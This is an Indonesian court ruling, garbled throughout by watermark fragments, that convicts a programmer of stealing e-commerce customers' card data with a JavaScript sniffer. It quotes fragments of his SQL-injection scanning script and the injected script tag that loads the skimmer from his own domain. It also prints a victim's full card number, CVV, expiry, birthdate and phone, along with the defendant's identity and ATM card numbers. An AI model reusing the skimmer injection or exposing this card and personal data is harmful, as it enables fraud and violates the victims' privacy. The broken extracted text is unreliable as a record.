pelanggan toko online seperti nomor kartu kredit, nama, alamat email, alamat, detail
ah
login dan kata sandi pengguna secara real time.

R
si
- Bahwa 400 (empat ratus) data informasi elektronik tersebut, kemudian terdakwa
simpan dalam komputer terdakwa pada folder C selama akhir tahun 2017 sampai
ne
ng
awal 2020.
- Bahwa data informasi elektronik dari pengguna atau pelanggan toko online seperti
do
gu
nomor kartu kredit, nama, alamat email, alamat, detail login dan kata sandi tersebut
kemudian terdakwa terdakwa jual atau terdakwa gunakan sendiri untuk membeli
barang-barang secara on-line antara lain jaket, sepatu, jam, kaca mata, tenda,
In
A
power bank, lampu outdoor, laptop sejak akhir tahun 2017 sampai dengan awal
tahun 2019.
ah
lik
- Bahwa dalam melakukan perbuatannya semua ini terdakwa tidak pernah

memberitahu, meminta ijin pemiliknya atau pihak yang berwenang.
m
ub
- Bahwa terdakwa melakukan perbuatannya tersebut menggunakan komputer yang

saat ini dijadikan barang bukti.
ka
- Bahwa barang bukti berupa kartu ATM BNI adalah milik terdakwa dan seingat
ep
terdakwa di dalamnya masih ada uang Rp. 600.000,- dan terdakwa tidak pernah
ah
memasukkan uang hasil perbuatannya ke dalam rekening BNI /kartu ATM BNI
R
tersebut.
es
- Bahwa barang bukti berupa modem adalah modem yang terdakwa gunakan untuk
M
ng
terhubung dengan internet sehingga terdakwa dapat melakukan perbuatannya.

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa perhiasan emas berupa kalung dan cincin merupakan milik terdakwa yang
R
terdakwa beli sendiri.
si
- Bahwa Terdakwa melakukannya secara iseng-iseng dan masih coba-coba;
ne
ng
- Bahwa selain data ada yang digunakan untuk keuntungan pribadi, ada juga yang
dijual dan ada yang hanya tersimpan saja;
- Bahwa keuntungan yang Terdakwa dapatkan dari hasil hacker adalah berupa
do
gu baju-baju/pakaian yang dijual online dan Laptop Alienware 15.6 tahun 2018
sebesar USD 1400 bila dirupiahkan sebesar Rp. 19.600.000 (Sembilan belas juta
In
A
enam ratus ribu rupiah);
- Bahwa terdakwa membenarkan barang bukti yang diperlihatkan di
ah
persidangan.
lik
Menimbang, bahwa Terdakwa tidak mengajukan Saksi yang meringankan (a
de charge);
am
ub
Menimbang, bahwa Penuntut Umum mengajukan barang bukti sebagai
berikut:
ep
 1 (satu) buah KTP atas nama ARDIANSYAH dengan N.I.K.
k
6408042509960006
ah
 1 (satu) buah SIM A atas nama ARDIANSYAH dengan nomor

R
si
14489609000016
 1 (satu) buah SIM C atas nama ARDIANSYAH dengan nomor
ne
ng
1723180100025
 1 (satu) buah kartu mahasiswa Universitas AMIKOM Yogyakarta atas nama
do
gu
ARDIANSYAH dengan nomor 16.01.3800

 1 (satu) buah kartu ATM Bank BNI dengan nomor kartu 5371762280132064
1 (satu) set perhiasan emas yang terdiri dari cincin dan kalung
In

A
Dikembalikan kepada Terdakwa;

 1 (satu) unit Modem Wifi indihome internet warna putih
ah
lik
 1 (satu) buah Flasdisk backup isi website www.rest_api.web.id

Dirusak sehingga tidak dapat dipergunakan lagi;
m
ub
 1 (satu) buah Hardisk dengan kapasitas 6 terra

 1 (satu) unit PC computer TUF GAMING VG27AQ
ka
Dirampas untuk negara;

ep
 1 (satu) bundle dokumen data perusahaan E-commers yang telah menjadi

ah
korban Mallware website www.rest_api.web.id yang berisi malware JS Sniffer.

R
 1 (satu) bundle screenshoot situs www.rest_api.web.id

es
 1 (satu) bundle screenshoot hasil scanning situs www.rest_api.web.id yang di

M
ng
blok anti virus karena mengandung Malware JS Snifer

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
 1 (satu) bundle skrip yang di tambahkan oleh tersangka didalam website
R
si
Tetap terlampir dalam berkas perkara;
ne
ng
Menimbang, bahwa berdasarkan alat bukti dan barang bukti yang diajukan
diperoleh fakta-fakta hukum sebagai berikut:
- Bahwa Terdakwa merupakan seorang progammer;
do
gu - Bahwa Terdakwa ARDIANSYAH pada akhir tahun 2017 membuat dan mengelola
website www.rest-api.web.id pada penyedia jasa hosting, IDwebhost, dimana
In
A
terdakwa membeli paket domain dan hosting secara daring (online) melalui alamat
website jasa hosting tersebut yaitu http://www.idwehost.com.
ah
- Bahwa Terdakwa kemudian mempelajari dan mendapatkan kode berbahaya yang
lik
dikenal sebagai JavaScript-Sniffer (JS Sniffer) sejenis malware yang dirancang
untuk mencuri data pembayaran pelanggan dari toko online dari artikel-artikel yang
am
ub
ada di google, yang lalu terdakwa memodifikasi script (bahasa pemrograman)
tersebut sesuai kebutuhan yang diinginkan yaitu data kartu kredit seperti nomor
ep
kartu kredit, nama, email, alamat, username, password dengan cara
k
menambahkan script get billing atau get payment. Setelah script dimodifikasi,
ah
terdakwa simpan dalam file manager cPanel website www.rest-api.web.id untuk

R
si
memudahkan terdakwa menggunakan script tersebut. Fungsi script JS Sniffer yang
disimpan di file manager cPanel website www.rest-api.web.id adalah bentuk
ne
ng
perintah dalam bahasa pemrograman agar malware masuk ke dalam website

“target”, lalu malware akan mengkloning data pembeli website toko melalui media
do
gu
daring (e-commerce) yang menjadi target, kemudian dikirimkan ke website

www.rest-api.web.id, sehingga pada saat bersamaan data pembeli yang masuk ke
website e-commerce target juga terkirim ke website www.rest-api.web.id.
In
A
ah
lik

m
ub
ka

ep
ah

R
import requests
es
import base64
import sys
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
si
ne
ng
q="""
SET @SALT = 'rp';
do
gu SELECT @EXTRA: = MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
In
A
"""

ah
lik
#
am
ub
Q",
ep
k
"forwarded": 1})
if r. ok:
ah
print "WORKED"
R
else:
si
ne
ng
- Bahwa saat terdakwa login sebagai admin website e-commerce yang

menjadi target dengan menggunakan username dan password hasil scanning,
terdakwa menginjeksi atau menyusupkan script JS Sniffer yang tersimpan di
do
gu
website www.rest-api.web.id dan sudah terdakwa modifikasi tersebut:

In
A
ah
lik
m
ub

ka
ep
ah
R
es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa Kemudian perintah login dan sisipan script JS Sniffer akan melakukan
R
scanning terhadap website e-commerce target, maka secara otomatis data-data
si
billing website e-commerce target akan masuk/dikirimkan ke website www.rest-
ne
ng
api.web.id dalam bentuk txt berisi data kartu kredit pembeli dari website e-
commerce target seperti nomor kartu kredit, nama, alamat dan kata sandi.
- Bahwa sejak akhir tahun 2017 sampai dengan tahun 2019, Terdakwa melakukan
do
gu kegiatan perekaman atas informasi elektronik milik pelanggan toko online berupa
data kartu kredit tanpa diketahui dan tanpa diijinkan oleh pelanggan toko online
In
A
selaku pemilik kartu kredit termasuk tanpa diijinkan oleh pengelola website toko
online (e-commerce) tersebut kemudian terdakwa yang di kirimkan ke alamat
ah
lik
Daerah Istimewa Yogyakarta;
am
ub
- Bahwa data kartu kredit milik orang lain yang direkam dan dikirimkan oleh terdakwa
ke data base website www.rest-api.web.id, antara lain Data Kartu Kredit American
ep
Express milik saksi Edward Kang sebagai pelanggan website
k
http://www.fullthrottlespeed.com yang oleh terdakwa direkam dan dikirimkan tanpa

ah
diketahui dan tanpa ijin baik dari saksi Edward Kang maupun saksi Caroline Ann
R
si
Ford selaku admin website http://www.fullthrottlespeed.com ke website www.rest-
api.web.id :
ne
ng
do
billing[company]:
gu
In
A
billing[region]:
billing[fax]:
ah
lik
=================================================
billing_address_id:
m
ub
billing[company]:
ka

ep

billing[region]:
ah
R
billing[fax]:
es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
R
payment[save]: 0
si
payment[save]: 1
=================================================
ne
ng
- Bahwa untuk data kartu kredit yang diambil datanya adalah data kartu kredit milik
saksi Ida Bagus Surya Manuaba, tapi belum digunakan;
do
gu Sent:
To:
Subject
28/1/2020 1:54:14 pm +0700
sosnovka.military2662@gmail.com
522846 - MASTERCARD CREDIT WORLD PT. ANZ PANIN BANK
In
#--------------------------------[ 1 6 S H O P] -----------------------------#
A
#--------------------------------[ LOGIN DETAILS] -------------------------------#
#--------------------------------[ CARD DETAILS] -------------------------------#
ah
lik
Level : WORLD
CC Number : 5228460001070490
am
ub
Expired : 02/2022
CVV : 142
AMEX CID :
Sort Code :
Credit Limit :
ep
k
Copy : 5228460001070490|02|22|142
#--------------------------[ JAPAN INFO] -----------------------------#
WEB ID :
ah
Card Password :
R
si
Last Name : Manuaba
ne
ng
City : Denpasar
State : Bali
Country : Indonesia
Zip : 80235
BirthDay : 28/07/1973
do
gu
Phone : 081236083110
ID Number :
Civil ID :
Qatar ID :
In
A
National ID :
Citizen ID :
Passport Number :
ah
lik

Account Number :
OSID Number :
#--------------------------[ PC INFORMATION] --------------------------------#
m
ub
IP Address : 36.85.246.149
Region : Bali
City : Denpasar
ka
Continent : Asia
ep

Date : 28 Jan, 2020, Time: 1:54 pm
ah

R
#--------------------------[ NEVER DIE ]-----------------------------#
es
- Bahwa keuntungan yang Terdakwa dapatkan dari hasil hacker adalah berupa
M
ng
baju-baju/pakaian dan barang elektronik seperti Laptop Alienware 15.6 tahun 2018
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
sebesar USD 1400 bila dirupiahkan sebesar Rp. 19.600.000,00 (sembilan belas
R
juta enam ratus ribu rupiah);
si
- Bahwa paket pesanan berupa 1 buah laptop Alienware 15.6 tahun 2018
ne
ng
tersebut tidak pernah sampai ke tangan terdakwa.
Menimbang, bahwa selanjutnya Majelis Hakim akan mempertimbangkan
apakah berdasarkan fakta-fakta hukum tersebut diatas, Terdakwa dapat dinyatakan
do
gu telah melakukan tindak pidana yang didakwakan kepadanya;
Menimbang, bahwa Terdakwa telah didakwa oleh Penuntut Umum dengan
In
A
dakwaan subsideritas, maka Majelis Hakim terlebih dahulu mempertimbangkan
dakwaan primer sebagaimana diatur dalam Pasal 31 ayat (1) jo. Pasal 47 Undang-
ah
Undang Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik
lik
sebagaimana diubah dengan Undang-Undang Nomor 19 Tahun 2016 tentang
Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan
am
ub
Transaksi Elektronik, yang unsur-unsurnya adalah sebagai berikut:
1. Setiap Orang
ep
2. dengan sengaja dan tanpa hak atau melawan hukum melakukan intersepsi
k
atau penyadapan atas informasi elektronik dan/atau dokumen elektronik dalam

ah
suatu komputer dan/atau sistem elektronik tertentu milik orang lain;

R
si
Menimbang, bahwa terhadap unsur-unsur tersebut Majelis Hakim
mempertimbangkan sebagai berikut:
ne
ng
Ad. 1. Unsur Setiap orang;

Menimbang, bahwa Pasal 1 ayat 22 Undang-undang Republik Indonesia
do
gu
Nomor 19 Tahun 2016 tentang Perubahan Atas Undang-Undang RI Nomor 11 Tahun

2008 tentang Informasi dan Transaksi Elektronik berbunyi : setiap orang adalah orang
perseorangan, baik warga negara Indonesia, warga negara asing, maupun badan
In
A
hukum;
Menimbang, bahwa berdasarkan Pasal 1 ayat 22 Undang-undang Republik
ah
lik
Indonesia Nomor 19 Tahun 2016 tentang Perubahan Atas Undang- Undang RI Nomor
11 Tahun 2008 tentang Informasi dan Transaksi Elektronik, maka yang dimaksud
m
ub
dengan setiap orang adalah manusia / orang (natuurlijke Persoon) dan badan hukum
(recht persoon) sebagai subyek hukum pendukung hak dan kewajiban yang mampu
ka
mempertanggung jawabkan setiap perbuatan yang dilakukannya;

ep
Menimbang, bahwa di persidangan telah dihadapkan Terdakwa

ah
ARDIANSYAH;
R
Menimbang, bahwa identitas lengkap Terdakwa ARDIANSYAH sebagaimana

es
telah diterangkan oleh Terdakwa dan Saksi – saksi di persidangan sama dengan
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
identitas Terdakwa ARDIANSYAH dalam Surat Dakwaan Penuntut Umum dalam
R
perkara ini;
si
Menimbang, bahwa berdasarkan identitas Terdakwa tersebut dapat
ne
ng
disimpulkan bahwa Terdakwa adalah manusia (natuurlijke Persoon);
Menimbang, bahwa terdakwa adalah manusia (natuurlijke Persoon), maka
berdasarkan Pasal 1 angka 21 Undang-undang Republik Indonesia Nomor 19 Tahun
do
gu 2016 tentang Perubahan Atas Undang-Undang RI Nomor 11 Tahun 2008 tentang
Informasi dan Transaksi Elektronik unsur setiap orang telah terpenuhi;
In
A
Ad. 2. Unsur dengan sengaja dan tanpa hak atau melawan hukum melakukan
intersepsi atau penyadapan atas informasi elektronik dan/atau dokumen elektronik
ah
dalam suatu komputer dan/atau sistem elektronik tertentu milik orang lain;
lik
Menimbang, bahwa yang dimaksud dengan sengaja menurut M.v.T (Memorie
van Toelichting) adalah “kesengajaan” (opzet) dalam arti : “menghendaki dan
am
ub
mengetahui” (wilens en wetens). Si Pelaku harus menghendaki dan mengetahui apa
akibat dari perbuatan yang dilakukannya;
ep
Menimbang, bahwa Penjelasan Pasal 31 Ayat (1) Undang – undang Nomor
k
19 Tahun 2016 tentang Perubahan Atas Undang-Undang RI Nomor 11 Tahun 2008

ah
tentang Informasi dan Transaksi Elektronik, yang dimaksud dengan intersepsi atau
R
si
penyadapan adalah kegiatan untuk mendengarkan, merekam, membelokkan,
mengubah, menghambat, dan/atau mencatat transmisi Informasi Elektronik dan/atau
ne
ng
Dokumen Elektronik yang tidak bersifat publik, baik menggunakan jaringan kabel
komunikasi maupun jaringan nirkabel, seperti pancaran elektromagnetis atau radio
do
gu
frekuensi. Sedang yang dimaksud Informasi Elektronik, Dokumen Elektronik dan

Sistem Elektronik dalam Undang – undang Republik Indonesia Nomor 19 Tahun 2016
tentang Perubahan Atas Undang – Undang RI Nomor 11 Tahun 2008 tentang
In
A
Informasi dan Transaksi Elektronik adalah sebagai berikut:

- Informasi Elektronik (Pasal 1 angka 1) adalah satu atau sekumpulan data
ah
lik
elektronik, termasuk tetapi tidak terbatas pada tulisan, suara, gambar, peta,
rancangan, foto, electronic data interchange (EDI), surat elektronik (electronic mail),
m
ub
telegram, teleks, telecopy atau sejenisnya, huruf, tanda, angka, Kode Akses,
simbol, atau perforasi yang telah diolah yang memiliki arti atau dapat dipahami oleh
ka
orang yang mampu memahaminya;

ep
- Dokumen Elektronik (Pasal 1 Angka 4) adalah setiap Informasi Elektronik

ah
yang dibuat, diteruskan, dikirimkan, diterima, atau disimpan dalam bentuk analog,
R
digital, elektromagnetik, optikal, atau sejenisnya, yang dapat dilihat, ditampilkan,

es
dan/atau didengar melalui Komputer atau Sistem Elektronik, termasuk tetapi tidak
M
ng
terbatas pada tulisan, suara, gambar, peta, rancangan, foto atau sejenisnya, huruf,
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
tanda, angka, Kode Akses, simbol atau perforasi yang memiliki makna atau arti
R
atau dapat dipahami oleh orang yang mampu memahaminya;
si
- Sistem Elektronik (Pasal 1 angka 5) adalah serangkaian perangkat dan
ne
ng
prosedur elektronik yang berfungsi mempersiapkan, mengumpulkan, mengolah,
menganalisis, menyimpan, menampilkan, mengumumkan, mengirimkan, dan/atau
menyebarkan Informasi Elektronik.
do
gu Menimbang, bahwa apabila Pasal 31 ayat (1) dikaitkan dengan ayat (3)
Undang-Undang Nomor 19 Tahun 2016 tentang Perubahan Atas Undang-Undang
In
A
Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik, maka perbuatan
intersepsi atau penyadapan diperbolehkan dalam rangka penegakan hukum
ah
atas permintaan kepolisian, kejaksaan, atau institusi lainnya (ex: KPK) yang
lik
kewenangannya ditetapkan berdasarkan Undang-undang, selain itu intersepsi
atau penyadapan dapat dikategorikan perbuatan tanpa hak/melawan hukum;
am
ub
Menimbang, bahwa berdasarkan fakta – fakta yuridis dipersidangan diketahui
bahwa Terdakwa yang merupakan seorang progammer, bertindak bagi dan untuk
ep
kepentingan dirinya sendiri, bukan dilakukan dalam rangka penegakan hukum atas
k
permintaan kepolisian, kejaksaan, atau institusi lainnya (ex: KPK) yang

ah
kewenangannya ditetapkan berdasarkan undangundang, pada akhir tahun 2017

R
si
membuat dan mengelola website www.rest-api.web.id pada penyedia jasa hosting,
IDwebhost, dimana terdakwa membeli paket domain dan hosting secara daring
ne
ng
(online) melalui alamat website jasa hosting tersebut yaitu http://www.idwehost.com,

kemudian mempelajari dan mendapatkan kode berbahaya yang dikenal sebagai
do
gu
JavaScript-Sniffer (JS Sniffer) sejenis malware yang dirancang untuk mencuri data
pembayaran pelanggan dari toko online dari artikel-artikel yang ada di google, setelah
dimodifikasi dengan cara menambahkan script get billing atau get payment kemudian
In
A
disimpan dalam file manager cPanel website www.rest-api.web.id dengan tujuan untuk
memudahkan terdakwa menggunakan script tersebut. Fungsi script JS Sniffer yang
ah
lik
disimpan di file manager cPanel website www.rest-api.web.id adalah bentuk perintah

dalam bahasa pemrograman agar malware masuk ke dalam website “target”, lalu
m
ub
commerce) yang menjadi target, kemudian dikirimkan ke website www.rest-api.web.id,
ka
sehingga pada saat bersamaan data pembeli yang masuk ke website e-commerce
ep
target juga terkirim ke website www.rest-api.web.id;

ah
Bahwa cara terdakwa mendapatkan data-data billing (pembelian) berupa data

R
kartu kredit dan passwordnya dari website e-commerce adalah diawali terdakwa
es

M
ng
(vulnerabilitas) siber menggunakan script pyton melalui Peladen Pribadi Virtual (Virtual
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Private Server atau disingkat VPS) sehingga terdakwa akan mendapatkan username
R
dan password untuk login (mengakses) ke website e-commerce yang memiliki
si
kelemahan tersebut sebagai target. Penggunaan script pyton oleh terdakwa
ne
ng
merupakan bentuk perintah untuk mencari akses admin dari website target yang akan
digunakan terdakwa untuk memasukkan malware:
import requests
do
gu import base64
import sys
In
A

ah
lik
q="""
am
ub
SET @SALT = 'rp';
ep
k
ah
"""
R
si
ne
ng
do
gu
Q",
"forwarded": 1})
if r. ok:
In
A
print "WORKED"
else:
ah
lik
Bahwa saat terdakwa login sebagai admin website e-commerce yang

menjadi target dengan menggunakan username dan password hasil scanning,
m
ub
terdakwa menginjeksi atau menyusupkan script JS Sniffer yang tersimpan di website

www.rest-api.web.id dan sudah terdakwa modifikasi tersebut:
ka
ep

ah

R
es
M

ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
si
ne
ng
do
gu <script src='https://rest-api.web.id/evil.js'></script>
Bahwa kemudian perintah login dan sisipan script JS Sniffer akan melakukan
In
A
scanning terhadap website e-commerce target, maka secara otomatis data-data billing
website e-commerce target akan masuk/dikirimkan ke website www.rest-api.web.id
ah
lik
dalam bentuk txt berisi data kartu kredit pembeli dari website e-commerce target
seperti nomor kartu kredit, nama, alamat dan kata sandi;
Bahwa sejak akhir tahun 2017 sampai dengan tahun 2019, Terdakwa
am
ub
melakukan kegiatan intersepsi/penyadapan/perekaman atas informasi elektronik milik
pelanggan toko online berupa data kartu kredit tanpa diketahui dan tanpa diijinkan oleh
ep
pelanggan toko online selaku pemilik kartu kredit termasuk tanpa diijinkan oleh
k
pengelola website toko online (e-commerce) tersebut kemudian terdakwa yang di

ah
kirimkan ke alamat website www.rest-api.web.id yang merupakan milik dan dikelola

R
si
oleh terdakwa di kontrakan terdakwa Singosari Ds. Jombor Baru No.3 Sinduadi Mlati
Kab. Sleman Daerah Istimewa Yogyakarta;
ne
ng
Bahwa data kartu kredit milik orang lain yang direkam dan dikirimkan oleh
terdakwa ke data base website www.rest-api.web.id, antara lain Data Kartu Kredit
do
gu
American Express milik saksi Edward Kang sebagai pelanggan website

http://www.fullthrottlespeed.com yang oleh terdakwa direkam dan dikirimkan tanpa
In
diketahui dan tanpa ijin baik dari saksi Edward Kang maupun saksi Caroline Ann Ford
A
selaku admin website http://www.fullthrottlespeed.com ke website www.rest-api.web.id:

ah
lik
billing[company]:
m
ub

ka
billing[region]:
ep
billing[fax]:
ah
R
=================================================
billing_address_id:
es
M
ng
billing[company]:
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
R
si
billing[region]:
ne
ng
billing[fax]:
do
gu payment[cc_exp_month]: 10
payment[save]: 0
payment[save]: 1
In
A
=================================================
Bahwa untuk data kartu kredit yang diambil datanya adalah data kartu kredit
ah
lik
milik saksi Ida Bagus Surya Manuaba, tapi belum digunakan;
am
ub
Sent: 28/1/2020 1:54:14 pm +0700
ep
#--------------------------------[ 1 6 S H O P] -----------------------------#
k
#--------------------------------[ LOGIN DETAILS] -------------------------------#

ah
R
#--------------------------------[ CARD DETAILS] -------------------------------#
si
Level : WORLD
ne
ng

CC Number : 5228460001070490
Expired : 02/2022
CVV : 142
AMEX CID :
do
gu
Sort Code :
Credit Limit :
Copy : 5228460001070490|02|22|142
#--------------------------[ JAPAN INFO] -----------------------------#
WEB ID :
In
A
Card Password :
Last Name : Manuaba
ah

lik
City : Denpasar
State : Bali
Country : Indonesia
Zip : 80235
m
ub
BirthDay : 28/07/1973
Phone : 081236083110
ID Number :
ka
Civil ID :
ep
Qatar ID :
National ID :
Citizen ID :
ah
Passport Number :
R

es

Account Number :
M
OSID Number :
ng
#--------------------------[ PC INFORMATION] --------------------------------#

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
IP Address : 36.85.246.149
Region : Bali
R
City : Denpasar
si
Continent : Asia
ne
ng
Date : 28 Jan, 2020, Time: 1:54 pm
#--------------------------[ NEVER DIE ]-----------------------------#
do
gu Menimbang, bahwa tujuan Terdakwa melakukan intersepsi/penyadapan atas
informasi elektronik dan/atau dokumen elektronik dalam suatu komputer dan/atau
In
A
sistem elektronik tertentu milik orang lain adalah untuk mendapatkan keuntungan
yakni digunakan oleh Terdakwa untuk membeli baju/pakaian dan barang elektronik,
ah
lik
seperti Laptop Alienware 15.6 tahun 2018 sebesar USD 1400 bila dirupiahkan sebesar
Rp. 19.600.000,00 (sembilan belas juta enam ratus ribu rupiah), meskipun Laptop
tersebut tidak diterima oleh Terdakwa;
am
ub
Menimbang, bahwa dengan demikian unsur ini telah terpenuhi;
Menimbang, bahwa oleh karenanya semua unsur dari Pasal 31 ayat (1) jo.
ep
Pasal 47 Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan Transaksi
k
Elektronik sebagaimana diubah dengan Undang-Undang Nomor 19 Tahun 2016

ah
tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang Informasi

R
si
dan Transaksi Elektronik telah terpenuhi dan Terdakwa haruslah dinyatakan telah
terbukti secara sah dan meyakinkan melakukan tindak pidana sebagaimana
ne
ng
didakwakan dalam dakwaan primair;

Menimbang, bahwa oleh karena dakwaan primair telah terbukti maka
do
gu
dakwaan subsidair dan seterusnya tidak perlu dipertimbangkan lagi;

Menimbang, bahwa selama persidangan berlangsung, Majelis Hakim tidak
In
menemukan hal-hal yang dapat menghapuskan sifat pertanggungjawaban pidana
A
pada diri Terdakwa, baik itu sebagai alasan pembenar maupun sebagai alasan
pemaaf, maka Terdakwa harus mempertanggungjawabkan perbuatan yang telah
ah
lik
dilakukannya dan oleh karenanya harus dinyatakan bersalah serta dijatuhi pidana
sesuai dengan perbuatannya;
m
ub
Menimbang, bahwa mengenai permohonan Terdakwa yang pada pokoknya

mohon keringanan hukuman Majelis Hakim akan mempertimbangkan bersaman
ka
dengan keadaan yang memberatkan dan meringankan terhadap diri Terdakwa;

ep
Menimbang, bahwa dalam perkara ini terhadap Terdakwa telah dikenakan

ah
penangkapan dan penahanan yang sah, maka masa penangkapan dan penahanan
R
tersebut harus dikurangkan seluruhnya dari pidana yang dijatuhkan;

es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Menimbang, bahwa oleh karena Terdakwa ditahan dan penahanan terhadap
R
Terdakwa dilandasi alasan yang cukup, maka perlu ditetapkan agar Terdakwa tetap
si
berada dalam tahanan;
ne
ng
Menimbang, bahwa terhadap barang bukti yang diajukan di persidangan
untuk selanjutnya dipertimbangkan sebagai berikut:
Menimbang, bahwa barang bukti berupa:
do
gu - 1 (satu) unit Modem Wifi indihome internet warna putih;
- 1 (satu) buah Flasdisk backup isi website www.rest_api.web.id
In
A
yang telah dipergunakan untuk melakukan kejahatan dan dikhawatirkan akan
dipergunakan untuk mengulangi kejahatan, maka perlu ditetapkan agar barang bukti
ah
tersebut: dirusak sehingga tidak dapat dipergunakan lagi;
lik
- 1 (satu) buah Hardisk dengan kapasitas 6 terra;
am
ub
- 1 (satu) unit PC computer TUF GAMING VG27AQ, yang telah dipergunakan
untuk melakukan kejahatan dan mempunyai nilai ekonomis, maka perlu ditetapkan
ep
agar barang bukti tersebut dirampas untuk negara;
k
Menimbang, bahwa barang bukti berupa :

ah
- 1 (satu) buah KTP atas nama ARDIANSYAH dengan N.I.K.

R
si
6408042509960006,
- 1 (satu) buah SIM A atas nama ARDIANSYAH dengan nomor
ne
ng
14489609000016,
- 1 (satu) buah SIM C atas nama ARDIANSYAH dengan nomor
do
gu
1723180100025,
- 1 (satu) buah kartu mahasiswa Universitas AMIKOM Yogyakarta atas nama
ARDIANSYAH dengan nomor 16.01.3800,
In
A
- 1 (satu) buah kartu ATM Bank BNI dengan nomor kartu 5371762280132064,
- 1 (satu) set perhiasan emas yang terdiri dari cincin dan kalung,
ah
lik
yang telah disita dari Terdakwa, maka dikembalikan kepada Terdakwa;

m
ub

korban Mallware website www.rest_api.web.id yang berisi malware JS Sniffer;
ka
 1 (satu) bundle screenshoot situs www.rest_api.web.id;

ep

ah
blok anti virus karena mengandung Malware JS Snifer;

R

es
http://www.fullthrottlespeed.com;
M
ng

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Menimbang, bahwa untuk menjatuhkan pidana terhadap Terdakwa, maka
R
perlu dipertimbangkan terlebih dahulu keadaan yang memberatkan dan yang
si
meringankan Terdakwa;
ne
ng
Keadaan yang memberatkan:
- Perbuatan Terdakwa melanggar privasi orang lain yang merupakan hak asasi
manusia;
do
gu - Perbuatan Terdakwa merugikan orang lain;
Keadaan yang meringankan:
In
A
- Terdakwa menyesali perbuatannya;
- Terdakwa belum pernah dihukum;
ah
Menimbang, bahwa sebagaimana tujuan pemidanaan bahwa pemidanaan
lik
merupakan ultimum remedium atau penyelesaian terakhir atas suatu masalah, maka
dalam menentukan pemidanaan menurut Memorie van Toelichting harus diperhatikan
am
ub
keadaan obyektif dari tindak pidana yang dilakukan, sehingga pemidanaan tidak
hanya menimbulkan perasaan tidak nyaman terhadap pelaku (rechtguterverletzung),
ep
tetapi juga merupakan treatment komprehensif yang melihat aspek pembinaan bagi
k
Terdakwa sendiri untuk dapat sadar dan tidak akan mengulangi perbuatannya kembali
ah
dan juga harus melihat implikasi sosial kemasyarakatannya dalam kerangka tujuan
R
si
pemidanaan yang preventif, edukatif dan korektif, sehingga mampu memenuhi rasa
keadilan masyarakat;
ne
ng
Menimbang, bahwa oleh karena Terdakwa dijatuhi pidana, maka haruslah

dibebani pula untuk membayar biaya perkara;
do
gu
Memperhatikan, Pasal 31 ayat (1) jo. Pasal 47 Undang-Undang Nomor 11

Tahun 2008 tentang Informasi dan Transaksi Elektronik sebagaimana diubah dengan
In
A
Undang-Undang Nomor 19 Tahun 2016 tentang Perubahan Atas Undang-Undang

Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik dan Undang-
ah
lik
undang Nomor 8 Tahun 1981 tentang Hukum Acara Pidana serta peraturan
perundang-undangan lain yang bersangkutan;
m
ub
MENGADILI:
ka
1. Menyatakan Terdakwa ARDIANSYAH telah terbukti secara sah dan

ep
meyakinkan bersalah melakukan tindak pidana dengan sengaja dan tanpa hak
ah
atau melawan hukum melakukan intersepsi atau penyadapan atas informasi

R
elektronik dan/atau dokumen elektronik dalam suatu komputer dan/atau sistem

es
elektronik tertentu milik orang lain;

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
2. Menjatuhkan pidana kepada Terdakwa oleh karena itu dengan pidana penjara
R
selama 6 (enam) bulan dan denda sejumlah Rp5.000.000,00 (lima juta rupiah)
si
dengan ketentuan apabila denda tersebut tidak dibayar diganti dengan pidana
ne
ng
kurungan selama 2 (dua) bulan;
3. Menetapkan masa penangkapan dan penahanan yang telah dijalani
Terdakwa dikurangkan seluruhnya dari pidana yang dijatuhkan;
do
gu 4. Menetapkan Terdakwa tetap ditahan;
5. Menetapkan barang bukti berupa:
In
A
 1 (satu) unit Modem Wifi indihome internet warna putih
 1 (satu) buah Flasdisk backup isi website www.rest_api.web.id
ah
Dirusak sehingga tidak dapat dipergunakan lagi;
lik
 1 (satu) buah Hardisk dengan kapasitas 6 terra
 1 (satu) unit PC computer TUF GAMING VG27AQ
am
ub
Dirampas untuk negara;
 1 (satu) buah KTP atas nama ARDIANSYAH dengan N.I.K.
ep
6408042509960006
k
 1 (satu) buah SIM A atas nama ARDIANSYAH dengan nomor

ah
14489609000016
R
si
 1 (satu) buah SIM C atas nama ARDIANSYAH dengan nomor
1723180100025
ne
ng
 1 (satu) buah kartu mahasiswa Universitas AMIKOM Yogyakarta atas nama

ARDIANSYAH dengan nomor 16.01.3800
do
gu
 1 (satu) buah kartu ATM Bank BNI dengan nomor kartu 5371762280132064
 1 (satu) set perhiasan emas yang terdiri dari cincin dan kalung
Dikembalikan kepada Terdakwa;
In
A

korban Mallware website www.rest_api.web.id yang berisi malware JS Sniffer.
ah
lik
 1 (satu) bundle screenshoot situs www.rest_api.web.id

m
ub
blok anti virus karena mengandung Malware JS Snifer

ka
ep

ah
6. Membebankan kepada Terdakwa membayar biaya perkara sejumlah

R
Rp2.000,00 (dua ribu rupiah);

es
Demikianlah diputuskan dalam sidang permusyawaratan Majelis Hakim

M
ng
Pengadilan Negeri Sleman, pada hari Rabu, tanggal 01 Juli 2020, oleh kami, Rosihan
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
